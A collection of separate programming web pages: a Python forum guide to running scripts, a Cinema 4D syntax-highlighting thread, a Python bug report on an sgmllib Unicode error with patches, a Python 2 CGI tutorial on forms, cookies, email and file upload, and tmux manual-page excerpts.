*IDLE is also one of the IDEs that does not show the ... in the embedded interpreter for indentation. If you use the interpreter a lot, it is advised to find another IDE or use the command line.
If you are confused by the process of using an IDE, or if you still think Python requires IDLE to run, then install some other IDEs and use them for a while; try at least five of them. In addition, open and write a file in Notepad and execute it in the command prompt. Then create a file, write it, and execute it entirely from the command prompt, without using an IDE or GUI text editor. At that point you may start to understand the concept.
Command Line / Terminal
More often than you think, people will not use an IDE. In this case you open any text editor you want, write code, and save it with the file extension ".py". An IDE is just a fancy text editor, that's it! You can use anything – Gedit, Notepad, IDLE, whatever – to write the code. All IDEs have a way to run code quickly, but you can also run scripts from the terminal/DOS prompt as shown below.
- Code: Select all
test.py
For Windows simplicity, put this test.py file in the directory where you started the interactive prompt, for example:
- Code: Select all
c:\Python32\test.py
and example of the same path executed:
- Code: Select all
c:\Python32>python test.py
Then you open a Terminal/DOS prompt, change directory to where test.py lives, and type:
- Code: Select all
python test.py
The same as before with the interactive prompt, but this time we add an argument: your .py file.
So in short, you can either change to the directory that the file lives in and execute it from there:
- Code: Select all
C:\>cd C:\my_python_lib
C:\my_python_lib>python.exe test.py
or you can execute it from any directory if you give the full path of the file:
- Code: Select all
C:\>python.exe C:\my_python_lib\test.py
Does your program just flicker and then go away when executed? Most Windows users are accustomed to double clicking an icon to run a program. To adjust the program for double clicking, the basic method is to add the builtin input function at the end so the program waits for the user to hit Enter before it closes: raw_input() for Python 2.x and input() for Python 3.x. Put this at the end of the file and it will keep the program from exiting prematurely. This is only needed if you plan to execute the program by double clicking it; if you use a command line/terminal to execute the program, you can still view its output after it exits, as you simply get the prompt back.
Linux
- Code: Select all
metulburr@ubuntu:~$ touch tester.py
metulburr@ubuntu:~$ vim tester.py
metulburr@ubuntu:~$ cat tester.py
print('this is a test')
metulburr@ubuntu:~$ python3 tester.py
this is a test
metulburr@ubuntu:~$
This example shows the creation and execution of a one-line Python script. 'touch tester.py' creates the file (although vim would create it anyway). 'vim tester.py' opens one of the numerous text editors; remember, you can use anything. 'cat tester.py' shows the content of the .py file that I wrote in vim. 'python3 tester.py' executes the script with Python 3.x, and 'this is a test' is the program's output.
Command line commands
It depends on what OS you are on as to what the commands are. Some basics are:
- Code: Select all
cd something
to change into the directory named 'something'. If that directory is nested inside another, you first have to change to the outer directory, then to this one.
- Code: Select all
ls
to list the current directory contents in Linux
- Code: Select all
dir
to list the current directory contents in Windows
Interactive prompt help()
While in the interactive prompt, you can use the help function to show the documentation for a specific module. For 3rd party modules you have installed, import the module and then call help(your_module); it will show a description, classes, functions, version number, and author. For builtins it will show the class, its methods, and a description of each method, etc.
Import a module and pass it to help():
- Code: Select all
>>>from bs4 import BeautifulSoup
>>>help(BeautifulSoup)
>>>import urllib
>>>help(urllib)
show me the documentation for strings
- Code: Select all
>>>help(str)
show the specific method s.find()
- Code: Select all
>>>help(str.find)
show all modules installed for this version of python
- Code: Select all
>>>help('modules')
Resources
IDEs
Python Integrated Development Environments (IDE). A list of IDEs and info about them.
Internet Relay Chat (IRC) - an IRC channel that is friendly and helpful
When you ask a question for the first time and no one is chatting, wait for up to a couple of hours before closing out, to give us time to see it. Three minutes is not enough – we are not sitting there all day staring at IRC waiting for questions.
IRC in Browser
SERVER: irc.freenode.net
CHANNEL: #python-forum
Official python site
Python tutorials
Download python versions, tutorials, information
PEPS
Information on Python proposals; for example, PEP 8 gives guidelines for style in Python code.
Online Interpreter
Test Python without installing it
Porting Guide
Check the different modules for 2.x versus 3.x
Modules ported to Python3.x
View 3rd party modules and see if they have been ported to Python 3.x yet. Even if the module you are looking for does not support Python 3.x, there may be workarounds, beta versions, etc. that you can use to get it working. Google and research, and you might be surprised what people have accomplished.
Some 3rd party modules
Django
Web framework for python.
Bottle
Lightweight web framework for python
BeautifulSoup
Parse HTML with Python
wxPython
PyQt
GUI Libraries for Python. There is also tkinter which comes with python (most of the time)
PyGame
2D gaming Library for python
PyOpenGL
3D Library
cx_freeze
package your apps with their dependencies
py2exe
package your apps for Windows users
Avoiding massive elif statements
The first example shows elif statements as you would learn them in any tutorial; the second shows the same thing done with no elif statements. It does the same job but reduces the code and makes it easier to debug in the future.
- Code: Select all
choice = input('enter a number')
if choice == '0':
    print('you chose zero')
elif choice == '1':
    print('you chose one')
elif choice == '2':
    print('you chose two')
elif choice == '3':
    print('you chose three')
else:
    print('out of range/invalid')
- Code: Select all
user_choice = {'0':'zero', '1':'one', '2':'two', '3':'three'}
choice = input('enter a number')
try:
    print('you chose {}'.format(user_choice[choice]))
except KeyError:
    print('out of range/invalid')
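The same dictionary trick also scales past strings: you can map choices to functions, so each choice runs arbitrary code. A sketch (the handler names here are made up for illustration):

```python
# Map choices to functions instead of strings; each handler can then
# do arbitrary work instead of just producing a word.
def say_zero():
    return 'you chose zero'

def say_one():
    return 'you chose one'

handlers = {'0': say_zero, '1': say_one}

def respond(choice):
    try:
        return handlers[choice]()  # look up the handler and call it
    except KeyError:
        return 'out of range/invalid'

print(respond('0'))  # you chose zero
print(respond('9'))  # out of range/invalid
```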
http://www.python-forum.org/viewtopic.php?f=10&t=55
|
MultiLineEditText Documentation
- blastframe last edited by blastframe
Hello,
I'm using Python syntax highlighting with a GeDialog MultiLineEditText. In order to make this work, I have to pass c4d.DR_MULTILINE_PYTHON | c4d.DR_MULTILINE_SYNTAXCOLOR as the style's symbol IDs. This was not clear from the documentation, which describes DR_MULTILINE_SYNTAXCOLOR as C.O.F.F.E.E. syntax highlighting. It took me some time to figure out that DR_MULTILINE_PYTHON does not work on its own and that DR_MULTILINE_SYNTAXCOLOR is not strictly for C.O.F.F.E.E. Could you please explain this better in the documentation?
Thank you.
Sorry for the late reply – I thought I had answered, but had not.
The next documentation release will be fixed:
DR_MULTILINE_SYNTAXCOLOR enables syntax coloring for C.O.F.F.E.E. or Python. Since C.O.F.F.E.E. has been removed, it only applies to Python highlighting.
DR_MULTILINE_PYTHON enables Python-specific line-return handling: e.g. after writing def Something(): and pressing Enter, the caret (text cursor) moves to a new line and indents it to match Python syntax rules.
Cheers,
Maxime.
https://plugincafe.maxon.net/topic/12810/multilineedittext-documentation
|
Created on 2007-02-04 22:34 by nagle, last changed 2009-03-31 22:12 by georg.brandl. This issue is now closed.
I'm running a website page through BeautifulSoup. It parses OK with Python 2.4, but Python 2.5 fails with an exception:
Traceback (most recent call last):
  File "./sitetruth/InfoSitePage.py", line 268, in httpfetch
    self.pagetree = BeautifulSoup.BeautifulSoup(sitetext) # parse into tree form
  File "./sitetruth/BeautifulSoup.py", line 1326, in __init__
    BeautifulStoneSoup.__init__(self, *args, **kwargs)
  File "./sitetruth/BeautifulSoup.py", line 973, in __init__
    self._feed()
  ...
  File "/usr/lib/python2.5/sgmllib.py", line 291, in parse_starttag
    self.finish_starttag(tag, attrs)
  File "/usr/lib/python2.5/sgmllib.py", line 340, in finish_starttag
    self.handle_starttag(tag, method, attrs)
  File "/usr/lib/python2.5/sgmllib.py", line 376, in handle_starttag
    method(attrs)
  File "./sitetruth/BeautifulSoup.py", line 1416, in start_meta
    self._feed(self.declaredHTMLEncoding)
  ...
  File "/usr/lib/python2.5/sgmllib.py", line 285, in parse_starttag
    self._convert_ref, attrvalue)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 0: ordinal not in range(128)
The code that's failing is in "_convert_ref", which is new in Python 2.5. That function wasn't present in 2.4. I think the code is trying to handle single quotes inside of double quotes in HTML attributes, or something like that.
To replicate, run
or
through BeautifulSoup.
Something about this code doesn't like big companies. Web sites of smaller companies are going through OK.
I had a similar problem recently and did not have time to file a bug-report. Thanks for doing that.
The problem is the code that handles entity and character references in SGMLParser.parse_starttag. Seems that it is not careful about unicode/str issues.
(But maybe Beautifulsoup needs to tell it to?)
My quick'n'dirty workaround was to remove the offending char-entity from the website before feeding it to BeautifulSoup:
text = text.replace('&reg;', '') # remove the "registered" sign entity
cheers,
stefan
Found the problem. In sgmllib.py for Python 2.5, in convert_charref, the code for handling character escapes assumes that ASCII characters have values up to 255.
But the correct limit is 127, of course.
If a Unicode string is run through SGMLParser, and that string has a character in an attribute with a value between 128 and 255 (which is valid in Unicode), the value is passed through as a character with "chr", creating a one-character invalid ASCII string. Then, when the bad string is later converted to Unicode as the output is assembled, the UnicodeDecodeError exception is raised.
So the fix is to change 255 to 127 in convert_charref in sgmllib.py,
as shown below. This forces characters above 127 to be expressed with
escape sequences. Please patch accordingly. Thanks.
def convert_charref(self, name):
    """Convert character reference, may be overridden."""
    try:
        n = int(name)
    except ValueError:
        return
    if not 0 <= n <= 127:  # ASCII ends at 127, not 255
        return
    return self.convert_codepoint(n)
We've been running this fix for several months now, and it seems to work. Would someone please check it and put it into the trunk? Thanks.
Hello,
I've been able to fix this entity conversion bug with the following patch.
Cheers,
Odie
--- /usr/lib/python2.5/sgmllib.py 2007-05-27 17:55:15.000000000 +0200
+++ modules/sgmllib.py 2007-06-06 18:29:13.000000000 +0200
@@ -396,7 +396,7 @@
         return self.convert_codepoint(n)

     def convert_codepoint(self, codepoint):
-        return chr(codepoint)
+        return unichr(codepoint)

     def handle_charref(self, name):
         """Handle character reference, no need to override."""
Restore bug title.
The 255 -> 127 change works for me. Let me know if I can help with unit
tests or whatever to get this patched.
A patch against SVN trunk including a unittest would be great.
Attached patch against SVN trunk including unittest. The test is not
great, because it practically only checks if the patch was applied and
not the real-life situation where the exception occurs, but I'm not too
handy with sgmllib (I only encountered this problem through
BeautifulSoup).
Committed in r70906.
http://bugs.python.org/issue1651995
|
If you've ever seen Python in action, even at a distance, I'm sure you'll agree that it looks pretty neat. The combination of development speed, out-of-the-box power, and stunning syntax usually means you end up with one thing: elegant, maintainable solutions, quickly. And let's face it, that's just what web developers are looking for, right?
I’ll let you judge for yourself…
In this article we’re going to be using Python to write some small and (hopefully) interesting examples, starting with simple form handling and ending with a complete, full featured (upload limit, file types etc.) upload script that you can use in your websites!
If you haven't guessed it already, this is a Python article, so if you're new to the language I highly recommend reading Martin Tsachev's Getting Started with Python before reading this one. If you need a quick intro to Python CGI, skim over Preston Landers' "Writing CGI Programs in Python".
Before we get going, you'll need a few things to run the examples in this article:
1. A web server set up to handle CGI (tested with Apache)
2. The latest version of Python from
Creating a Form to Display User Details
Possibly the most important thing a web application does is collect user input. And like most things, Python has just the module we need in its Standard Library.
Let's jump right in and write a small function to display the user's details, if any were entered. (For this we'll assume our form has three input boxes named 'name', 'age' and 'email', a check box named 'done', and a 'submit' button.)
#!/usr/bin/env python
import cgi

form = cgi.FieldStorage()

def values(fields):
    for value in fields:
        if value in form: print form[value].value + '<br />'

if __name__ == '__main__':
    print 'Content-Type: text/html\n'
    if 'submit' in form and 'done' in form:
        values(('name', 'age', 'email'))
    else:
        print 'if you were directed here in error please visit here.com'
This is very simple but it gives you an idea of how easy working with forms is when you strip away all the crap!
In this example (and most of the examples in this article) we start by importing the cgi module and creating an instance of the FieldStorage() class to store our form values. Next we define a function called values() which takes a sequence of field names and iterates over them, printing each value that was set. Before the function outputs anything, we check that the 'submit' and 'done' fields exist.
Chances are you noticed this already, but just for clarity: forms in Python work like any dictionary, except that you access a field's contents through its .value attribute, i.e. form['key'].value gives you the value.
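If you want to poke at this key/value shape outside a web server, the standard library's query-string parser shows the same structure (Python 3's urllib.parse shown here; note every key maps to a list, because HTML forms may repeat a field):

```python
from urllib.parse import parse_qs

# A query string as a browser would submit it for our three-field form.
fields = parse_qs('name=Bob&age=42&email=bob%40example.com')
print(fields['name'][0])   # Bob
print(fields['email'][0])  # bob@example.com - the %40 escape is decoded
```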
Creating a Warning
Like life itself, we seem to want more control. This next function will give us just that, and output a warning if a field wasn't filled in correctly!
#!/usr/bin/env python
import cgi, re

form = cgi.FieldStorage()

def check(**fields):
    for field in fields:
        if field in form:
            value = form[field].value
            if re.search(fields[field], value): print value + '<br />'
            else: print field, 'was not filled in correctly!<br />'

if __name__ == '__main__':
    print 'Content-Type: text/html\n'
    if 'submit' in form and 'done' in form:
        check(name = '^[a-zA-Z ]+$', age = '^\d{2}$')
    else:
        print 'if you were directed here in error please visit here.com'
Since this is pretty similar to our other function, I'm just going to skip over it quickly. If you've ever used Perl, then you've already spotted the regular expressions hiding in there.
Regular expressions in Python are accessed through the re module (Python's regular expression library), for obvious reasons… regular expressions still seem like the best way to describe and check form values.
If you want to find out more about regular expressions and Python check out the ‘re’ module at
Then if the value isn’t what we want, we get a warning instead of just ignoring the field.
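You can verify the two patterns used in check() on their own; a standalone sketch:

```python
import re

# The age pattern from check(): exactly two digits.
assert re.search(r'^\d{2}$', '42')
assert not re.search(r'^\d{2}$', '7')
assert not re.search(r'^\d{2}$', '123')

# The name pattern: one or more letters and spaces only.
assert re.search(r'^[a-zA-Z ]+$', 'Guido van Rossum')
assert not re.search(r'^[a-zA-Z ]+$', 'R2D2')
```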
Anyone wondering what **fields is all about? I'm sure someone is. The simplest explanation is that it tells the function to accept a variable number of keyword arguments, which are collected into a dictionary, i.e.:
>>> def show(*args, **kwds):
...     print args, kwds
...
>>> show()
() {}
>>> show('interesting', 'dont ya think!', arg1 = 'str1', arg2 = 2)
('interesting', 'dont ya think!') {'arg1': 'str1', 'arg2': 2}
>>>
Simple, and very useful from time to time! Time for a cookie break… No, not the food… although still pretty sweet over all.
Cookies
Next up we’ll use Python’s ‘Cookie’ module to do a little baking! (Ironically I suck at making real cookies.)
>>> import Cookie
>>> cookie = Cookie.SimpleCookie()
>>> cookie['number1'] = 'some values'
>>> cookie['number2'] = 'some values'
>>> cookie['number3'] = 'some values'
>>> cookie['number3']['expires'] = 3600
>>> print cookie
Set-Cookie: number1="some values";
Set-Cookie: number2="some values";
Set-Cookie: number3="some values"; expires=Fri, 30-Jan-2004 12:03:20 GMT;
Ok, you have to agree, setting cookies couldn't be much simpler, and the Cookie module wraps it up nicely. The difficulty comes when you want to retrieve your values… ok, maybe I'm exaggerating a little here.
#!/usr/bin/env python
import os

def monster():
    if 'HTTP_COOKIE' in os.environ:
        cookies = os.environ['HTTP_COOKIE']
        cookies = cookies.split('; ')
        handler = {}
        for cookie in cookies:
            cookie = cookie.split('=')
            handler[cookie[0]] = cookie[1]
        return handler

if __name__ == '__main__':
    import Cookie
    cookie = Cookie.SimpleCookie()
    cookie['monster'] = 'cookievalue'
    print cookie
    print 'Content-Type: text/html\n'
    print 'Hit refresh to see the cookie!!!<br />'
    print 'Hewwo, im the cookie', monster()
This is all about parsing the HTTP_COOKIE header and inserting the cookie values into a dictionary.
We start by importing the os module and defining the monster() function, which checks whether the HTTP_COOKIE environment variable exists. If it does, we split it, leaving us with a list of 'key=value' strings. After that, all that's left is to loop over the list, split each entry again, and place the pairs into the dictionary.
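Worth knowing: the Cookie module can also do this parsing for you. SimpleCookie accepts a raw header string via load(), so a hand-rolled splitter like monster() isn't strictly necessary. A sketch using Python 3's http.cookies (the module is named Cookie in Python 2):

```python
from http.cookies import SimpleCookie

# Parse a raw Cookie header string, as the browser would send it.
jar = SimpleCookie()
jar.load('monster=cookievalue; count=3')
print(jar['monster'].value)  # cookievalue
print(jar['count'].value)    # 3
```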
Ok, finally let's do something a little useful with our cookies… and in keeping with our final example, we're going to create a counter function which lets you set limits on different processes. Observe and enjoy.
#!/usr/bin/env python
import Cookie, os

def limits(count):
    if 'HTTP_COOKIE' in os.environ:
        cookies = os.environ['HTTP_COOKIE']
        cookies = cookies.split('; ')
        handler = {}
        for cookie in cookies:
            cookie = cookie.split('=')
            handler[cookie[0]] = cookie[1]
        if 'count' in handler:
            number = int(handler['count'])
            if number < count:
                cookie = Cookie.SimpleCookie()
                cookie['count'] = number + 1
                cookie['count']['expires'] = 86400
                print cookie
                return True
    else:
        print Cookie.SimpleCookie('count=1')
        return True

if __name__ == '__main__':
    if limits(5):
        print 'user was under their limit, do this...'
    else:
        print 'user was over their limit, do nothing!'
The start of this is exactly the same as our monster() function, except that if there are no cookies set, we create one and set its value to one. If there are cookies to unpack, we check for 'count' in the handler dictionary and convert its value to a number using int(). That number is then compared to the count parameter to check whether the user is under or over their limit. Provided they're under it, we update the cookie and set the expiry to 24 hours before returning True; this is done so we can use if-else blocks to control the user's access.
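The counting logic itself can be separated from the cookie plumbing, which makes it easy to reason about; a minimal sketch (the function name under_limit is made up for illustration):

```python
def under_limit(current, maximum):
    """Return the new count if the caller is still within the limit, else None."""
    new_count = (current or 0) + 1  # no cookie yet counts as zero visits
    if new_count <= maximum:
        return new_count
    return None

assert under_limit(None, 5) == 1  # no cookie yet: start counting
assert under_limit(4, 5) == 5     # last allowed visit
assert under_limit(5, 5) is None  # over the limit
```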
Sending Email
Ok, what about sending email? What sounds like a big, scary subject is actually pretty simple once you get down to it. And because of Python’s amazingly clear syntax it’s very clean, not to mention compact.
#!/usr/bin/env python
import smtplib

def mail(address, subject, message, host = 'localhost'):
    headers = 'From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n%s'
    message = headers % (address[0], ','.join(address[1:]), subject, message)
    server = smtplib.SMTP(host)
    server.sendmail(address[0], address[1:], message)
    server.quit()

if __name__ == '__main__':
    mail(('someone@somewhere.com', 'sometwo@somewhere.com'), 'subject', 'message')
Admit it, how much smaller is that than you expected! Before we delve deeper into this function, you need to understand a little about how it’s being called or chances are you’ll end up with errors!
mail(('from', 'to', ...), 'subject', 'message', ['host'])
The first argument here is a sequence of two or more addresses, the first being the ‘From’ address and the rest ‘To’ addresses. Followed by the ‘Subject’ and ‘Message’. You may also need to tell this function what host you want to use if one isn’t available locally.
For this example we started by importing the ‘smtplib‘ module, which provides functions/classes for sending emails from Python… so mail() is really just a wrapper over what you would normally do to send email, but it does make things easier!
That is to say, inside mail() we do two main things…
- Create a MIME header containing our 'From' and 'To' addresses, as well as any other data we want to send, i.e. Subject, Message, Content-Type. When complete this is assigned to the 'message' variable.
- Connect to the mail server using the SMTP() class. If the connection is successful, the addresses and 'message' header are sent using the sendmail() method before quitting.
If you plan on playing with smtplib or similar modules, then you'll probably end up thanking the programmer who wrote the set_debuglevel() method! In my experience, anything that could go wrong will go wrong the first few times, i.e.:
server = smtplib.SMTP(host)
server.set_debuglevel(1)
server.sendmail(from_addr, to_addrs, message)
server.quit()
A Last Example
So far you’ve seen how you can use Python to get forms data, create cookies and send email… in this last example we’ll be using as much of what you’ve learned here as we can (without going over the top).
#!/usr/bin/env python
import cgi, os, sys

sys.stderr = sys.stdout

def uploads(form, name, path, *args):
    if form.has_key(name):
        # If the form field exists in 'form' then parse the filename to
        # point at the desired location.
        path = os.path.join(path, os.path.basename(form[name].filename))
        for each in args:
            # Loop over the allowed file types and check whether the file
            # being uploaded is the right format and does not already exist.
            if path.endswith(each) and not os.path.isfile(path):
                file(path, 'wb').write(str(form[name].value))
                # Return True to indicate the file was uploaded successfully.
                return True

if __name__ == '__main__':
    form = cgi.FieldStorage()
    print 'Content-Type: text/html\n'
    if uploads(form, 'upload', '', '.txt', '.zip'):
        # If the upload was successful then print a message.
        print 'Finished uploading file...'
    else:
        print 'Failed to upload file. Please visit our help center at...'
If you want to give this a go, you’ll need a form set up for file upload; something like this one…
<form name="upload" method="POST" action="upload.py" enctype="multipart/form-data">
<input name="upload" type="file" /><input type="submit" name="submit" />
</form>
This is pretty small as functions go, but there's quite a lot going on right from the beginning!
As in our other examples, this starts by importing the modules we need into the program's global namespace. Unlike those examples, our next line redirects errors to standard output; this simply sends error messages, as you would normally get from Python, to the web browser instead of the error log.
If you're going to use Python for CGI, then you should definitely take a look at the 'cgitb' module.
Inside uploads()
We first need to make sure that the field 'name' provided is in our 'form'. As long as it is, we take the file's path (as it appeared in the file field) and get its name using os.path.basename(). We then join that name to 'path' using the os.path.join() function; this lets us upload files to different places while keeping the original filename.
Next we loop over the allowed file types in 'args' and check the file's extension against each type. If the file is a valid type, then we make sure it doesn't already exist (existing files won't be overwritten) before writing the file to the server.
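The basename/join step can be tried on its own; the paths here are made up for illustration:

```python
import os

upload_dir = "uploads"
# Path as it might appear in the browser's file field (hypothetical):
submitted = "/home/user/photos/cat.png"

name = os.path.basename(submitted)     # strip the directories: 'cat.png'
dest = os.path.join(upload_dir, name)  # 'uploads/cat.png' on POSIX systems
```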
As in the limits() example, uploads() can be used with an if statement to check whether the function succeeded. You could even combine it with limits() so the user can only upload a set number of files per day.
Ok, by now you should have a fair idea of what writing web applications with Python is about and why you would want to, as well as some idea of what's possible... but this is only the tip of the iceberg!
Hope you've had fun. If you want to learn more about Python or the subjects covered here, then start clicking:
- Python homepage
- Python tutorial
- Python documentation online
- Apache homepage
- Apache documentation
- mod_python homepage
- Zope homepage
- Spyce [Python Server Pages] homepage
Note: All the sample programs shown and discussed in this article were tested on Windows XP running Python 2.3 under Apache 1.3. The upload script was tested on a remote Linux server.
tmux - terminal multiplexer
tmux [-2CluvV] [-c shell-command] [-f file] [-L socket-name] [-S socket-path] [command [flags]]
TMUX(1)                   BSD General Commands Manual                   TMUX(1)

     -u      Write UTF-8 output to the terminal even if the first
             environment variable of LC_ALL, LC_CTYPE, or LANG that is set
             does not contain "UTF-8" or "UTF8".

     -v      Request verbose logging; a log file is generated with a copy of
             everything tmux writes to the terminal. The SIGUSR2 signal may
             be sent to the tmux server process to toggle logging between on
             (as if -v was given) and off.

     -V      Report the tmux version.

     command [flags]
             This specifies one of a set of commands used to control tmux,
             as described in the following sections. If no commands are
             specified, the new-session command is assumed.

DEFAULT KEY BINDINGS
     m       Mark the current pane (see select-pane -m).
     M       Clear the marked pane.
     n       Change to the next window.
     o       Select the next pane in the current window.
     p       Change to the previous window.
     q       Briefly display pane indexes.
     r       Force redraw of the attached client.

COMMAND PARSING AND EXECUTION
     tmux supports a large number of commands which can be used to control
     its behaviour. Each command is named and can accept zero or more flags
     and arguments. They may be bound to a key with the bind-key command or
     run from the shell prompt, a shell script, a configuration file or the
     command prompt. For example, the same set-option command run from the
     shell prompt, from ~/.tmux.conf and bound to a key may look like:

           $ tmux set-option -g status-style bg=cyan

           set-option -g status-style bg=cyan

           bind-key C set-option -g status-style bg=cyan

     Here, the command name is `set-option', `-g' is a flag and
     `status-style' and `bg=cyan' are arguments.

     tmux distinguishes between command parsing and execution. In order to
     execute a command, tmux needs it to be split up into its name and
     arguments. This is command parsing. If a command is run from the
     shell, the shell parses it; from inside tmux or from a configuration
     file, tmux does. Examples of when tmux parses commands are:

           -   in a configuration file;
           -   typed at the command prompt (see command-prompt);
           -   given to bind-key;
           -   passed as arguments to if-shell or confirm-before.
     To execute commands, each client has a `command queue'. A global
     command queue not attached to any client is used on startup for
     configuration files like ~/.tmux.conf. Parsed commands added to the
     queue are executed in order. Some commands, like if-shell and
     confirm-before, parse their argument to create a new command which is
     inserted immediately after themselves. This means that arguments can be
     parsed twice or more - once when the parent command (such as if-shell)
     is parsed and again when it parses and executes its command.

     Commands like if-shell, run-shell and display-panes stop execution of
     subsequent commands on the queue until something happens - if-shell and
     run-shell until a shell command finishes and display-panes until a key
     is pressed. For example, the following commands:

           new-session; new-window
           if-shell "true" "split-window"
           kill-session

     Will execute new-session, new-window, if-shell, the shell command
     true(1), split-window and kill-session in that order.

     The COMMANDS section lists the tmux commands and their arguments.

PARSING SYNTAX
     This section describes the syntax of commands parsed by tmux, for
     example in a configuration file or at the command prompt. Note that
     when commands are entered into the shell, they are parsed by the shell
     - see for example ksh(1) or csh(1).

     Each command is terminated by a newline or a semicolon (;). Commands
     separated by semicolons together form a `command sequence' - if a
     command in the sequence encounters an error, no subsequent commands are
     executed.

     Comments are marked by the unquoted # character - any remaining text
     after a comment is ignored until the end of the line.

     If the last character of a line is \, the line is joined with the
     following line (the \ and the newline are completely removed). This is
     called line continuation and applies both inside and outside quoted
     strings and in comments, but not inside braces.
     Command arguments may be specified as strings surrounded by single (')
     quotes, double quotes (") or braces ({}). This is required when the
     argument contains any special character. Single and double quoted
     strings cannot span multiple lines except with line continuation.
     Braces can span multiple lines.

     Outside of quotes and inside double quotes, these replacements are
     performed:

     -   Environment variables preceded by $ are replaced with their value
         from the global environment (see the GLOBAL AND SESSION ENVIRONMENT
         section).

     -   A leading ~ or ~user is expanded to the home directory of the
         current or specified user.

     -   \uXXXX or \uXXXXXXXX is replaced by the Unicode codepoint
         corresponding to the given four or eight digit hexadecimal number.

     -   When preceded (escaped) by a \, the following characters are
         replaced: \e by the escape character; \r by a carriage return; \n
         by a newline; and \t by a tab.

     -   \ooo is replaced by a character of the octal value ooo. Three octal
         digits are required, for example \001. The largest valid character
         is \377.

     -   Any other characters preceded by \ are replaced by themselves (that
         is, the \ is removed) and are not treated as having any special
         meaning - so for example \; will not mark a command sequence and \$
         will not expand an environment variable.

     Braces are similar to single quotes in that the text inside is taken
     literally without any replacements but this also includes line
     continuation. Braces can span multiple lines in which case a literal
     newline is included in the string. They are designed to avoid the need
     for additional escaping when passing a group of tmux or shell commands
     as an argument (for example to if-shell or pipe-pane).
     These two examples produce an identical command - note that no escaping
     is needed when using {}:

           if-shell true {
               display -p 'brace-dollar-foo: }$foo'
           }

           if-shell true "\n display -p 'brace-dollar-foo: }\$foo'\n"

     Braces may be enclosed inside braces, for example:

           bind x if-shell "true" {
               if-shell "true" {
                   display "true!"
               }
           }

     Environment variables may be set by using the syntax `name=value', for
     example `HOME=/home/user'. Variables set during parsing are added to
     the global environment.

     Commands may be parsed conditionally by surrounding them with `%if',
     `%elif', `%else' and `%endif'. The argument to `%if' and `%elif' is
     expanded as a format (see FORMATS) and if it evaluates to false (zero
     or empty), subsequent text is ignored until the closing `%elif',
     `%else' or `%endif'. For example, a conditional can set the status line
     to red if running on `myhost', green if running on `myotherhost', or
     blue if running on another host. Conditionals may be given on one line,
     for example:

           %if #{==:#{host},myhost} set -g status-style bg=red %endif

COMMANDS
     This section describes the commands supported by tmux. Most commands
     accept the optional -t argument. This may be the token `{mouse}'
     (alternative form `=') to specify the session, window or pane where the
     most recent mouse event occurred (see the MOUSE SUPPORT section) or
     `{marked}' (alternative form `~') to specify the marked pane.

     shell-command arguments are executed directly (without `sh -c'). This
     can avoid issues with shell quoting. For example:

           $ tmux new-window vi /etc/passwd

     Will run vi(1) directly without invoking the shell.

     command [arguments] refers to a tmux command, either passed with the
     command and arguments separately, for example:

           bind-key F1 set-option status off

     Or passed as a single string argument in .tmux.conf, for example:

           bind-key F1 { set-option status off }

     Example tmux commands include:

           refresh-client -t/dev/ttyp2
           rename-session -tfirst newname
           set-option -wt:0 automatic-rename off

     If -x is given, send SIGHUP to the parent process of the client as well
     as detaching the client, typically causing it to exit.
     With -E, run shell-command to replace the client.

     list-commands [command]
           (alias: lscm)
           List the syntax of command or - if omitted - of all commands
           supported by tmux.

     ... the size comes from the global default-size option; -x and -y can
     be used to specify a different size. `-' uses the size of the current
     client if any. If -x or -y is given, the default-size option is set for
     the session.

     If run from a terminal, any termios(4) special characters are saved and
     used for new windows in the new session.

     The -A flag makes new-session behave like attach-session if
     session-name already exists; in this case, -D behaves like -d to
     attach-session, and -X behaves like -x. The group argument may be:

           1.  the name of an existing group, in which case the new session
               is added to that group;

           2.  the name of an existing session - the new session is added to
               the same group as that session, creating a new group if
               necessary;

           3.  the name for a new group containing only the new session.

     refresh-client [-cDlLRSU] [-C XxY] [-F flags] [-t target-client]
           [adjustment]
           (alias: refresh)
           Refresh the current client if bound to a key, or a single client
           if one is given with -t. If -S is specified, only update the
           client's status line.

           The -U, -D, -L, -R, and -c flags allow the visible portion of a
           window which is larger than the client to be changed. -U moves
           the visible part up by adjustment rows and -D down, -L left by
           adjustment columns and -R right. -c returns to tracking the
           cursor automatically. If adjustment is omitted, 1 is used.

           Note that the visible position is a property of the client not of
           the window, changing the current window in the attached session
           will reset it.

           -C sets the width and height of a control client and -F sets a
           comma-separated list of flags. Currently the only flag available
           is `no-output' to disable receiving pane output.

           -l requests the clipboard from the client using the xterm(1)
           escape sequence and stores it in a new paste buffer.
     -L, -R, -U and -D move the visible portion of the window left, right,
     up or down by adjustment, if the window is larger than the client. -c
     resets so that the position follows the cursor. See the window-size
     option.

     With -t, display the log for target-client. -J and -T show debugging
     information about jobs and terminals.

     source-file [-nqv] path ...
           (alias: source)
           Execute commands from one or more files specified by path (which
           may be glob(7) patterns). If -q is given, no error will be
           returned if path does not exist. With -n, the file is parsed but
           no commands are executed. -v shows the parsed commands and line
           numbers if possible.

     start-server
           (alias: start)
           Start the tmux server, if not already running, without creating
           any sessions.

           Note that as by default the tmux server will exit with no
           sessions, this is only useful if a session is created in
           ~/.tmux.conf, exit-empty is turned off, or another command is run
           as part of the same command sequence. For example:

                 $ tmux start \; show -g

     suspend-client [-t target-client]
           (alias: suspendc)
           Suspend a client by sending SIGTSTP (tty stop).

     switch-client [-ElnprZ] [-c target-client] [-t target-session]
           [-T key-table]
           (alias: switchc)
           Switch the current session for client target-client to
           target-session. As a special case, -t may refer to a pane (a
           target that contains `:', `.' or `%'), to change session, window
           and pane. In that case, -Z keeps the window zoomed if it was
           zoomed.

     By default, a tmux pane permits direct access to the terminal contained
     in the pane. A pane may also be put into one of several modes:

     -   Copy mode, which permits a section of a window or its history to be
         copied to a paste buffer for later insertion into another window.
         This mode is entered with the copy-mode command, bound to `[' by
         default.

     -   View mode, which is like copy mode but is entered when a command
         that produces output, such as list-keys, is executed from a key
         binding.
     -   Choose mode, which allows an item to be chosen from a list. This
         may be a client, a session or window or pane, or a buffer. This
         mode is entered with the choose-buffer, choose-client and
         choose-tree commands.

     In copy mode an indicator is displayed in the top-right corner of the
     pane with the current position and the number of lines in the history.

     Commands are sent to copy mode using the -X flag to the send-keys
     command. When a key is pressed, copy mode automatically uses one of two
     key tables, depending on the mode-keys option: copy-mode for emacs, or
     copy-mode-vi for vi. Key tables may be viewed with the list-keys
     command.

     The following commands are supported in copy mode:

           Command                                     vi        emacs
           append-selection
           append-selection-and-cancel                 A
           back-to-indentation                         ^         M-m
           begin-selection                             Space     C-Space
